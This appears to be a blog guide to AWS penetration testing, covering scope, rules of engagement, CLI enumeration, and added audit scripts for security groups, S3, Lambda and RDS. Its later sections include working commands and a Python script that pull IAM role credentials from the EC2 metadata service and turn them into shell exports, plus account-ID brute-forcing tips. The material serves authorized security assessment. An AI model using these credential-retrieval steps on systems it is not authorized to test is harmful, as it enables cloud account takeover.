The Ultimate AWS Penetration Testing Handbook

When it comes to using AWS, keeping cloud security tight is a big deal for companies. They rely on penetration testing to find and fix any weak spots in their security. AWS offers a reliable and scalable place for cloud computing, which is why so many people use it. Knowing how crucial penetration testing is can help these organizations keep their important data safe from breaches that happen online.

What is AWS Penetration Testing?

AWS pentesting is a proactive security assessment in which testers simulate real-world attacks against the systems, networks, applications, and other assets an organization runs in AWS, including the account configuration itself. It improves the overall security posture of the AWS environment, validates that security controls actually work, and helps meet compliance requirements.

Penetration testing on AWS lets organizations find and fix security weaknesses before malicious actors exploit them.

Benefits of AWS Penetration Testing

  • Improved security posture

  • Validated security controls

  • Compliance with regulations

  • Proactive identification and remediation of vulnerabilities

AWS Shared Responsibility Model

Security on AWS follows a shared responsibility model in which Amazon and the customer each own specific layers. Here's a breakdown of these responsibilities:

  • Amazon's Responsibilities: Amazon secures the infrastructure that runs every service in the AWS Cloud. This includes the physical hardware, supporting software, networking, and facilities that host AWS Cloud services.

  • Customer's Responsibilities: Customers are responsible for everything they put in the cloud: their data, IAM users, roles and policies, the guest operating system (including updates and security patches), application software, and the configuration of AWS-provided controls such as security groups. Customers do not need prior approval from AWS to pentest the permitted services discussed in the next section, but they remain bound by the policy's list of prohibited activities.

What Are You Allowed and Not Allowed to Test in AWS?

When performing penetration testing in AWS, it is crucial to understand what is permitted and what is not permitted to ensure compliance with the terms and conditions of AWS. While AWS encourages security testing, certain limitations and guidelines must be followed.

Allowed:

  • Web application scanning

  • Port scanning

  • Injections

  • Exploitation

  • Vulnerability scanning or checks

  • Forgery

  • Fuzzing

Not Allowed:

  • DNS zone walking via Amazon Route 53 hosted zones, DNS hijacking, or DNS pharming

  • Protocol flooding

  • Port flooding

  • Denial of Service (DoS) and Distributed Denial of Service (DDoS)

  • Simulated DoS and DDoS

  • Request flooding (API request flooding, login request flooding)

Prerequisites to Testing on AWS

Before conducting a pentest on AWS, the following aspects should be agreed in writing:

  • The scope of the pentest: This includes the target system.

  • The kind of test to be carried out: This could be a black-box test, white-box test, or gray-box test.

  • Requirements of the test: These should be mutually decided between stakeholders and the pentesting contractor.

  • A protocol the pentester should follow in case they discover a vulnerability: This helps ensure responsible disclosure and remediation.

  • A schedule for the pentest: This will help manage expectations and resources.

  • Written authorization by system owners for pentesters to conduct the test: This is crucial to ensure compliance and avoid any misunderstandings.

Three Main Types of AWS Testing

  • Testing on the Cloud: Testing customer workloads that are exposed to the internet, as an external attacker would see them. An example would be a virtualized system that has been moved from on-premises to the cloud.

  • Testing in the Cloud: Testing systems within the cloud that are not exposed publicly. An example would be testing the server hosting an application.

  • Testing the Cloud Console: A configuration test of the cloud console. Examples would be looking at user accounts, their permissions, and access management configurations.

How to Perform Penetration Testing on AWS

Here are the general steps to perform penetration testing on AWS:

  1. Seek Appropriate Authorization: Before conducting any testing, ensure you have explicit written authorization from the AWS account owner or organization.

  2. Define Scope and Goals: Identify the target systems, applications, and AWS services to be tested. Consider any specific compliance requirements or sensitive data that must be protected.

  3. Set Up Testing Environment: Create a separate testing environment within AWS, which is different from the production environment to avoid unintentional interruptions. This includes setting up virtual instances, networks, and security groups specifically for the pentest.

  4. Map the Attack Surface: Gather as much information about the AWS environment as you can. This includes identifying services, instances, subnets, S3 buckets, Identity and Access Management (IAM) roles, and other potentially vulnerable components. Techniques include network scanning, vulnerability scanning, and, if the rules of engagement permit it, social engineering.

  5. Perform Vulnerability Assessment: Test the mapped attack surface for exploitable weaknesses (misconfigurations, over-permissive IAM, exposed services, leaked credentials), confirm which findings are exploitable within the agreed scope, and document each with evidence and a remediation recommendation.

Preparing for an AWS Penetration Test

A cloud penetration test in AWS typically follows the same phases as a traditional penetration test but requires additional considerations specific to cloud services. Here's an overview of the phases involved in a cloud penetration test:

  1. Prerequisites and Scope: Define the scope of the penetration test, including which services and resources will be tested, and ensure compliance with AWS's Shared Responsibility Model and Customer Support Policy for penetration testing.

  2. Attack Surface Identification: Identify and enumerate the cloud services in use within the scope of the test.

  3. Testing: Execute the penetration test against the identified services, focusing on vulnerabilities specific to cloud environments.

Prerequisites and Scope

Before starting the technical part of the penetration test, it is essential to define the scope and boundaries of the assessment. Key considerations include:

  • Service Inventory: Determine which AWS services are being used.

  • IAM Policies: Identify non-standard IAM policies and the number of policies and accounts.

  • Shared Responsibility Model: Understand that some aspects of AWS infrastructure cannot be tested without explicit permission.

AWS’s Shared Responsibility Model delineates that AWS is responsible for the security "of" the cloud (infrastructure and services), while the customer is responsible for the security "in" the cloud (configuring services securely).

Basics to Interact with AWS

Interacting with AWS during a penetration test often involves using the AWS Command Line Interface (CLI). The AWS CLI is a critical tool for accessing and managing AWS services, especially when AWS authentication credentials are available.

AWS Cloud Services Overview

Amazon Web Services (AWS) offers a wide range of cloud services, including storage, databases, and compute power. With data centers in more than two dozen geographic regions, AWS supports global access to its services, and most resources (and therefore most enumeration) are region-scoped.

Rules of Engagement for AWS Penetration Tests

AWS's Customer Support Policy outlines the rules of engagement for penetration tests. Customer resources on permitted services, such as applications hosted on S3, can be tested without prior approval, while certain activities are prohibited outright: DNS zone walking via Route 53 hosted zones and any form of Denial of Service (DoS), including simulated DoS and request flooding.

Common AWS Penetration Testing Techniques

1. External Reconnaissance

External reconnaissance involves gathering information about the target AWS environment using both standard penetration testing tools and AWS-specific methods. Examples include:

  • AWS Marketplace: Search for the target organization; AMIs and other products it has published expose the owning AWS account ID.

  • Brute-Forcing Account ID: Use the AWS Sign-In URL (https://<account-id>.signin.aws.amazon.com/console) to test candidate account IDs and aliases.

  • Public Snapshots and AMI Images: Search for publicly available Elastic Block Store (EBS) snapshots and Amazon Machine Images (AMIs) owned by the target account that might reveal sensitive data; they can be copied into the tester's account and mounted.

2. Enumeration

Identify IAM Policies and Roles

Examine IAM policies and roles to identify overly permissive policies. Note that get-policy only returns metadata; the permissions live in the policy's default version, and inline policies have to be listed separately.

```bash
aws iam list-policies --scope Local --only-attached          # customer-managed policies actually in use
aws iam list-entities-for-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess   # who is admin?
aws iam get-policy-version --policy-arn <POLICY_ARN> --version-id <DEFAULT_VERSION_ID>   # version ID from get-policy
aws iam list-attached-user-policies --user-name <username>
aws iam list-user-policies --user-name <username>            # inline policies are easy to miss
aws iam list-roles
```

Security Groups and Network Configuration

Check for misconfigured security groups and network ACLs, starting with ingress rules open to 0.0.0.0/0 or ::/0 and subnets that auto-assign public IPs.

```bash
aws ec2 describe-security-groups --query "SecurityGroups[?IpPermissions[?IpRanges[?CidrIp=='0.0.0.0/0']]].[GroupId,GroupName]"
aws ec2 describe-network-acls
aws ec2 describe-subnets --query "Subnets[].[SubnetId,CidrBlock,MapPublicIpOnLaunch]"
```
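The CLI query above only catches the literal 0.0.0.0/0 on IPv4; a proper check has to handle IPv6 (::/0), the "-1" protocol that means every port, and port ranges. The script below is an added example (not code from the original post) that parses the JSON printed by `aws ec2 describe-security-groups --output json`, flags every world-open ingress rule, and highlights the rules that cover administrative or database ports. The SAMPLE document and the file name sg_audit.py are constructed for the demonstration.

```python
"""Flag security-group ingress rules that expose ports to the whole internet.

Run live with:  aws ec2 describe-security-groups --output json | python3 sg_audit.py
Without stdin it runs against the constructed SAMPLE below.
"""
import json
import sys

# Ports whose exposure to 0.0.0.0/0 is almost always a finding.
SENSITIVE_PORTS = {22: "SSH", 3389: "RDP", 3306: "MySQL", 5432: "PostgreSQL",
                   1433: "MSSQL", 6379: "Redis", 27017: "MongoDB", 9200: "Elasticsearch"}
WORLD = {"0.0.0.0/0", "::/0"}


def world_open_rules(sg):
    """Return one finding per ingress permission whose source is the whole internet."""
    findings = []
    for perm in sg.get("IpPermissions", []):
        sources = [r["CidrIp"] for r in perm.get("IpRanges", [])]
        sources += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
        public = sorted(set(sources) & WORLD)
        if not public:
            continue
        proto = perm.get("IpProtocol")
        if proto == "-1":            # "-1" means all protocols, hence all ports
            lo, hi = 0, 65535
        else:
            lo, hi = perm.get("FromPort", 0), perm.get("ToPort", 65535)
        hits = {p: n for p, n in SENSITIVE_PORTS.items() if lo <= p <= hi}
        findings.append({
            "group": sg["GroupId"],
            "name": sg.get("GroupName", ""),
            "protocol": "all" if proto == "-1" else proto,
            "ports": f"{lo}-{hi}" if lo != hi else str(lo),
            "sources": public,
            "sensitive": sorted(hits.values()),
        })
    return findings


def audit(describe_output):
    """Run world_open_rules over a whole describe-security-groups document."""
    out = []
    for sg in describe_output.get("SecurityGroups", []):
        out.extend(world_open_rules(sg))
    return out


# Constructed sample in the shape the CLI prints (not real account data).
SAMPLE = {"SecurityGroups": [
    {"GroupId": "sg-0aaa", "GroupName": "web",
     "IpPermissions": [
         {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
          "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
         {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
          "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []}]},
    {"GroupId": "sg-0bbb", "GroupName": "bastion-wide-open",
     "IpPermissions": [
         {"IpProtocol": "-1",
          "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}]},
    {"GroupId": "sg-0ccc", "GroupName": "db",
     "IpPermissions": [
         {"IpProtocol": "tcp", "FromPort": 3306, "ToPort": 3306,
          "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}]},
]}

if __name__ == "__main__":
    data = SAMPLE if sys.stdin.isatty() else json.load(sys.stdin)
    for f in audit(data):
        flag = " !! " + ", ".join(f["sensitive"]) if f["sensitive"] else ""
        print(f"{f['group']} ({f['name']}): {f['protocol']} {f['ports']} "
              f"from {', '.join(f['sources'])}{flag}")
```

A world-open 443 on a web tier is expected; the same rule on a group attached to an RDS instance or a bastion is the finding, so cross-check the flagged group IDs against `describe-instances` and `describe-db-instances` before reporting.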

3. Vulnerability Assessment

S3 Bucket Permissions

Check for publicly accessible S3 buckets or those with weak permissions. get-bucket-policy returns a NoSuchBucketPolicy error for buckets without a policy, so do not treat that as a failure, and always read the bucket's Public Access Block settings: they decide whether a public ACL or policy is actually honoured.

```bash
aws s3api list-buckets --query "Buckets[].Name"

for bucket in $(aws s3api list-buckets --query "Buckets[].Name" --output text); do
    echo "Checking permissions for bucket: $bucket"
    aws s3api get-bucket-acl --bucket "$bucket"
    aws s3api get-bucket-policy --bucket "$bucket" --query Policy --output text 2>/dev/null || echo "(no bucket policy)"
    aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null || echo "(no public access block)"
done
```
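Reading three documents per bucket by eye does not scale, and the decision is not obvious: a public ACL is harmless when IgnorePublicAcls is on, and a policy with Principal "*" may be narrowed by a Condition. The script below is an added example (not code from the original post) that combines the ACL, the bucket policy and the Public Access Block configuration into one public/not-public verdict. Inputs are the JSON documents the s3api commands above print (the policy arrives as a JSON string in the "Policy" field); the SAMPLE_* documents are constructed.

```python
"""Decide whether an S3 bucket is public from its ACL, policy and Public Access Block."""
import json
import subprocess

PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Grants to AllUsers/AuthenticatedUsers, as (grantee, permission) pairs."""
    hits = []
    for g in acl.get("Grants", []):
        uri = g.get("Grantee", {}).get("URI")
        if uri in PUBLIC_GRANTEES:
            hits.append((PUBLIC_GRANTEES[uri], g["Permission"]))
    return hits


def _is_wildcard_principal(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(policy_json):
    """Split Allow-to-everyone statements into unconditional (public) and conditioned (review).

    A Condition such as aws:SourceVpce or aws:SourceIp may still be permissive,
    so those statements are returned separately for manual review.
    """
    policy = json.loads(policy_json) if isinstance(policy_json, str) else policy_json
    stmts = policy.get("Statement", [])
    stmts = stmts if isinstance(stmts, list) else [stmts]
    public, review = [], []
    for s in stmts:
        if s.get("Effect") != "Allow" or not _is_wildcard_principal(s.get("Principal")):
            continue
        actions = s.get("Action", [])
        actions = actions if isinstance(actions, list) else [actions]
        (review if s.get("Condition") else public).append((s.get("Sid", ""), actions))
    return public, review


def bucket_is_public(acl, policy_json=None, public_access_block=None):
    """IgnorePublicAcls neutralises public ACLs; RestrictPublicBuckets neutralises public policies."""
    pab = (public_access_block or {}).get("PublicAccessBlockConfiguration", {})
    if public_acl_grants(acl) and not pab.get("IgnorePublicAcls"):
        return True
    if policy_json and public_policy_statements(policy_json)[0] and not pab.get("RestrictPublicBuckets"):
        return True
    return False


def audit_bucket_live(bucket):
    """Fetch the three documents with the AWS CLI (needs credentials) and return the verdict."""
    def cli(*args):
        r = subprocess.run(["aws", "s3api", *args, "--bucket", bucket, "--output", "json"],
                           capture_output=True, text=True)
        return json.loads(r.stdout) if r.returncode == 0 else None   # NoSuchBucketPolicy etc.
    policy = cli("get-bucket-policy")
    return bucket_is_public(cli("get-bucket-acl") or {},
                            policy["Policy"] if policy else None,
                            cli("get-public-access-block"))


# Constructed samples (not real account data).
SAMPLE_ACL = {"Owner": {"ID": "abc"}, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "abc"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"}]}
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:ListBucket"], "Resource": "arn:aws:s3:::example-bucket",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123"}}}]})
SAMPLE_PAB_LOCKED = {"PublicAccessBlockConfiguration": {
    "BlockPublicAcls": True, "IgnorePublicAcls": True,
    "BlockPublicPolicy": True, "RestrictPublicBuckets": True}}

if __name__ == "__main__":
    print("sample bucket public:", bucket_is_public(SAMPLE_ACL, SAMPLE_POLICY))
    print("same bucket with PAB locked:", bucket_is_public(SAMPLE_ACL, SAMPLE_POLICY, SAMPLE_PAB_LOCKED))
```

Account-level Public Access Block (`aws s3control get-public-access-block --account-id <id>`) overrides the bucket-level setting, so check it once per account before trusting a "not public" verdict.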

Lambda Functions

Inspect Lambda functions for insecure configurations or sensitive information. Environment variables are the usual place for hard-coded secrets, and get-function returns a short-lived presigned URL for the deployment package so the code itself can be downloaded and reviewed.

```bash
aws lambda list-functions --query "Functions[].[FunctionName,Runtime,Role]" --output table

for func in $(aws lambda list-functions --query "Functions[].FunctionName" --output text); do
    echo "Checking Lambda function: $func"
    aws lambda get-function-configuration --function-name "$func" --query "Environment.Variables"
    aws lambda get-function --function-name "$func" --query "Code.Location" --output text   # presigned URL to the package
done
```

RDS Security

Check for RDS instances with weak configurations or public accessibility. describe-db-instances already returns every instance, so filter it rather than looping over identifiers; PubliclyAccessible only matters together with the security groups attached to the instance.

```bash
aws rds describe-db-instances --query "DBInstances[].[DBInstanceIdentifier,Engine,PubliclyAccessible,StorageEncrypted,Endpoint.Address]" --output table

for db in $(aws rds describe-db-instances --query "DBInstances[?PubliclyAccessible].DBInstanceIdentifier" --output text); do
    echo "Publicly accessible: $db"
    aws rds describe-db-instances --db-instance-identifier "$db" --query "DBInstances[0].VpcSecurityGroups[].VpcSecurityGroupId"
done
```
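The two checks above (Lambda environment variables and RDS settings) are both "read the JSON, look for known-bad values" jobs, so this added example (not code from the original post) does them in one script: it scans each function's environment variables for secret-looking names and values, and lists the RDS instances whose settings a pentester would report. Inputs are the JSON from `aws lambda list-functions` and `aws rds describe-db-instances`; the SAMPLE_* documents, the function and instance names, and the access key (AWS's own documentation example key) are constructed, and the value patterns are heuristics.

```python
"""Secrets in Lambda environment variables and risky RDS settings, from CLI JSON."""
import re

# Variable names that usually hold credentials.
SECRET_NAME = re.compile(r"secret|passw(or)?d|token|api_?key|private_?key", re.I)
# Value shapes: IAM access key IDs (long-term AKIA, temporary ASIA) and a
# 40-character base64-like string, the shape of an AWS secret access key (heuristic).
KEY_ID = re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")
SECRET40 = re.compile(r"^[A-Za-z0-9/+=]{40}$")


def lambda_secret_findings(list_functions_output):
    """(function, variable, why) for every environment variable that looks like a secret."""
    findings = []
    for fn in list_functions_output.get("Functions", []):
        env = fn.get("Environment", {}).get("Variables", {})
        for name, value in env.items():
            reasons = []
            if SECRET_NAME.search(name):
                reasons.append("name")
            if KEY_ID.search(value) or value.startswith("-----BEGIN") or SECRET40.match(value):
                reasons.append("value")
            if reasons:
                findings.append((fn["FunctionName"], name, "+".join(reasons)))
    return findings


# Each RDS check: (finding label, predicate over one DBInstances[] entry).
RDS_CHECKS = [
    ("publicly accessible", lambda d: d.get("PubliclyAccessible") is True),
    ("storage not encrypted", lambda d: d.get("StorageEncrypted") is False),
    ("deletion protection off", lambda d: d.get("DeletionProtection") is False),
    ("IAM DB auth disabled", lambda d: d.get("IAMDatabaseAuthenticationEnabled") is False),
    ("no automated backups", lambda d: d.get("BackupRetentionPeriod", 0) == 0),
]


def rds_findings(describe_output):
    """(identifier, endpoint, [issues]) for every instance that fails at least one check."""
    out = []
    for db in describe_output.get("DBInstances", []):
        issues = [label for label, check in RDS_CHECKS if check(db)]
        if issues:
            ep = db.get("Endpoint", {})
            out.append((db["DBInstanceIdentifier"], f"{ep.get('Address')}:{ep.get('Port')}", issues))
    return out


# Constructed samples in the CLI's output shape (not real account data).
SAMPLE_LAMBDA = {"Functions": [
    {"FunctionName": "report-builder", "Role": "arn:aws:iam::123456789012:role/report-builder",
     "Environment": {"Variables": {
         "DB_PASSWORD": "hunter2",
         "AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE",   # AWS documentation example key
         "LOG_LEVEL": "info"}}},
    {"FunctionName": "thumbnailer", "Environment": {"Variables": {"BUCKET": "images"}}},
]}
SAMPLE_RDS = {"DBInstances": [
    {"DBInstanceIdentifier": "prod-db", "Engine": "postgres", "PubliclyAccessible": True,
     "StorageEncrypted": False, "DeletionProtection": True,
     "IAMDatabaseAuthenticationEnabled": False, "BackupRetentionPeriod": 7,
     "Endpoint": {"Address": "prod-db.abc.us-east-1.rds.amazonaws.com", "Port": 5432}},
    {"DBInstanceIdentifier": "internal-db", "Engine": "mysql", "PubliclyAccessible": False,
     "StorageEncrypted": True, "DeletionProtection": True,
     "IAMDatabaseAuthenticationEnabled": True, "BackupRetentionPeriod": 7,
     "Endpoint": {"Address": "internal.abc.us-east-1.rds.amazonaws.com", "Port": 3306}},
]}

if __name__ == "__main__":
    for fn, var, why in lambda_secret_findings(SAMPLE_LAMBDA):
        print(f"lambda {fn}: {var} looks like a secret ({why})")
    for ident, endpoint, issues in rds_findings(SAMPLE_RDS):
        print(f"rds {ident} ({endpoint}): {', '.join(issues)}")
```

A hit on a Lambda variable is only the start: the function's execution role (the Role field) tells you what the leaked credential or the function itself can reach, which is usually the more valuable finding.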

4. Local Filesystem Checks

When interactive access to an AWS service, such as an EC2 instance, is gained, common local filesystem checks are performed:

  • Discovery of Sensitive Information: Look for passwords, configuration files, and documentation that might reveal more about the environment.

  • Privilege Escalation: Identify misconfigurations or exploits that could elevate privileges.

  • Pivoting: Use port scanning and other techniques to move laterally within the network.

Additionally, check for:

  • AWS Access Credentials: Search for credentials in directories and application files.

  • AWS Metadata Service: Query the instance metadata service (IMDS) at http://169.254.169.254/ to gather instance-specific information and the credentials of any attached IAM role. Instances configured to require IMDSv2 reject plain GET requests, so always start with the PUT that obtains a session token; if the request times out from inside a container, the default hop limit of 1 is the likely reason.

Example: Accessing AWS Metadata Service

```bash
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
```

5. AWS Security Tokens

AWS security tokens provide temporary, limited-privilege access. They can be abused if they are not securely managed: any process on an EC2 instance with an attached IAM role can retrieve that role's temporary credentials from the metadata service, which is why SSRF and command injection on EC2 so often end in account access. Stolen credentials of this kind keep working from outside the instance until they expire.

Example: Retrieving IAM Role Credentials

```bash
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

IAM_ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)

curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE
```
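The two curl sequences above (metadata listing and role credential theft) share the same IMDSv2 token dance, so this added example (not code from the original post) implements that flow once and turns the credentials into the three environment exports the AWS CLI expects. The HTTP layer is passed in as a function: the default talks to 169.254.169.254 and only works on an EC2 instance, while `fake_imds` is a constructed stand-in with made-up credential values so the logic can be exercised anywhere.

```python
"""IMDSv2 credential retrieval from EC2 instance metadata, with pluggable HTTP."""
import json
import sys
import urllib.request

IMDS = "http://169.254.169.254/latest"
TOKEN_TTL = "21600"   # seconds; 21600 (6 h) is the maximum IMDS accepts


def http_request(url, method="GET", headers=None, timeout=2):
    """Body as str, or None on any error (IMDS disabled, hop limit exceeded, not on EC2)."""
    req = urllib.request.Request(url, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode()
    except Exception:
        return None


def fetch_role_credentials(request=http_request):
    """IMDSv2 flow: PUT for a token, GET the role name, GET that role's credentials."""
    token = request(f"{IMDS}/api/token", "PUT",
                    {"X-aws-ec2-metadata-token-ttl-seconds": TOKEN_TTL})
    if token is None:
        return None                      # no IMDSv2; do not silently fall back to v1
    hdr = {"X-aws-ec2-metadata-token": token}
    role = request(f"{IMDS}/meta-data/iam/security-credentials/", headers=hdr)
    if not role:
        return None                      # no instance profile attached
    role = role.strip().splitlines()[0]
    body = request(f"{IMDS}/meta-data/iam/security-credentials/{role}", headers=hdr)
    if body is None:
        return None
    creds = json.loads(body)
    if creds.get("Code") != "Success":
        return None
    return {"role": role, "AccessKeyId": creds["AccessKeyId"],
            "SecretAccessKey": creds["SecretAccessKey"], "Token": creds["Token"],
            "Expiration": creds["Expiration"]}


def as_exports(creds):
    """Shell lines that make the AWS CLI use the retrieved role credentials."""
    return "\n".join([
        f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}",
        f"export AWS_SECRET_ACCESS_KEY={creds['SecretAccessKey']}",
        f"export AWS_SESSION_TOKEN={creds['Token']}",
    ])


def fake_imds(url, method="GET", headers=None, timeout=2):
    """Constructed stand-in for an IMDSv2-only instance; values are not real credentials."""
    if url.endswith("/api/token") and method == "PUT":
        return "FAKE-TOKEN"
    if (headers or {}).get("X-aws-ec2-metadata-token") != "FAKE-TOKEN":
        return None                      # IMDSv2-required instances reject tokenless calls
    if url.endswith("/security-credentials/"):
        return "web-role\n"
    if url.endswith("/security-credentials/web-role"):
        return json.dumps({"Code": "Success", "Type": "AWS-HMAC",
                           "AccessKeyId": "ASIAEXAMPLEEXAMPLE01",
                           "SecretAccessKey": "constructed-secret",
                           "Token": "constructed-session-token",
                           "Expiration": "2030-01-01T00:00:00Z"})
    return None


if __name__ == "__main__":
    creds = fetch_role_credentials(fake_imds if "--demo" in sys.argv else http_request)
    print(as_exports(creds) if creds else "no role credentials available (not on EC2, or no instance profile)")
```

Run it with `--demo` off-instance to see the output shape; on an EC2 host it prints real exports, after which `aws sts get-caller-identity` confirms which role you now hold. The Expiration field is worth recording: credentials are rotated before it, so anything you plan to do with them has to fit in that window.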

6. AWS Security Token Permission Enumeration

Once AWS credentials are obtained, enumerate the permissions to understand what actions the compromised user or role can perform. Start with the identity itself, then list both attached and inline policies and fetch the default version of each attached policy. If the identity is denied iam:List*/iam:Get*, fall back to brute-force enumeration tools such as enumerate-iam.

Example: Enumerating Permissions

```bash
aws sts get-caller-identity
aws iam list-attached-role-policies --role-name <ROLE_NAME>
aws iam list-role-policies --role-name <ROLE_NAME>          # inline policies
aws iam get-policy --policy-arn <POLICY_ARN> --query Policy.DefaultVersionId --output text
aws iam get-policy-version --policy-arn <POLICY_ARN> --version-id <DEFAULT_VERSION_ID>
```

Suggested Tools for AWS Penetration Testing

Here are some recommended tools for conducting AWS penetration tests:

  • AWS CLI: A unified command line interface to manage AWS services.

  • Prowler: An open-source security tool for performing AWS security assessments and audits.

  • AWS Consoler: Converts AWS CLI credentials into AWS console access.

  • awsenum: Identifies permissions by brute-forcing different AWS operations.

  • enumerate-iam: Brute-forces IAM permissions by attempting read-only API calls with a given set of credentials, useful when iam:Get*/iam:List* is denied.

  • Scout Suite: A multi-cloud security-auditing tool.

  • WeirdAAL: AWS Attack Library.

  • Hacktricks Cloud AWS Pentesting: A collection of AWS attack vectors and methodologies.

Conclusion

Performing a penetration test in AWS involves understanding the specific services in use, the configurations and permissions set within the environment, and leveraging various tools and techniques to identify vulnerabilities. By following a structured approach and adhering to AWS's rules of engagement, security professionals can effectively assess and enhance the security posture of AWS environments.


Robin Joseph

Head of Security testing
